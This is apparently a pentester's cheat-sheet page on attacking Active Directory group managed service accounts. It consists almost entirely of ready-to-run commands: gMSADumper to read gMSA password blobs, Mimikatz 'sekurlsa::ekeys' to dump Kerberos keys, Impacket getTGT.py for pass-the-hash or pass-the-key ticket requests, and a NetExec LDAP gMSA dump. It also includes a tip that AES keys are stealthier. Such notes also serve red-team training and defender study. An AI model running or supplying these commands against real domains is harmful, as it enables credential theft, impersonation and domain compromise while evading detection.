gMSA

gMSADumper

GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.GitHub

python3 gMSADumper.py -u user -p password -d domain.local

Get keys from Mimikatz:

.\mimikatz.exe 'sekurlsa::ekeys' 'exit'
# grab rc4_hmac_nt

Steal the ticket/ pass the keyRequest the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

If not provided, password is asked

nxc ldap <host> -u <user> -p <password> --gmsa